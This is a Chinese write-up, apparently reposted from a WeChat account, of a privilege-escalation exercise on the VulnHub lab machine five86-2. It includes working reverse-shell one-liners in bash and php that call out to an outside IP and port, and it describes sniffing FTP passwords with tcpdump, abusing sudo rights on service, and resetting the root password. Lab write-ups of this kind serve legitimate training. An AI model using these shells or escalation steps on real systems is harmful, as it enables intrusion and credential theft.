上面说到,我们拿下了shell,但是感觉不是那么简单。果然。不是root权限。那就来提权吧。
bash -i >& /dev/tcp/192.168.3.251/4567 0>&1
反弹shell失败。查看一下用户whoami
得换一个反弹shell方法,这里用php
php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.3.251/4567");'
失败
php -r '$sock=fsockopen("192.168.3.251",4567);exec("/bin/bash -i <&3 >&3 2>&3");'
成功。
这里为什么要反弹shell呢?因为冰蝎终端不好用。顺便练习一下。
www-data用户,咋办。
还记得我们之前爆破的两个帐号不?先看看能不能用。
查看所有用户。
说明爆破的那两个帐号是这台服务器的帐号,登录一下。
第一个密码错误,只能登录第二个。
看看都有啥权限,进程。
这个地方其实卡住了,后来去看大佬资料才知道思路,通过tcpdump来嗅探ftp帐号密码。
两条命令,先查看接口
tcpdump -D
抓包
timeout 30 tcpdump -w 30.pcap -i veth3dcf8fa (设置时间,保存文件,接口)
保存后tcpdump -r 参数打开。
找到USER PASS。得到paul 帐号,
登录paul帐号
查看权限。sudo -l
可以无密码执行peter权限下的 /usr/sbin/service
提权到peter帐号。
查看一下权限,更大。
可以直接运行/usr/bin/passwd ,这就好说了。直接更改root密码
提权就到此结束了。但是咋没找到flag文件呢?翻了一会,原来在root目录下。打开就ok。
这个靶机到此就渗透结束了。期间借鉴了大佬的思路。不然真的拿不下来。感谢大佬的文章!
原文始发于微信公众号(backdoor):vulnhub five86-2 靶机渗透(下)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论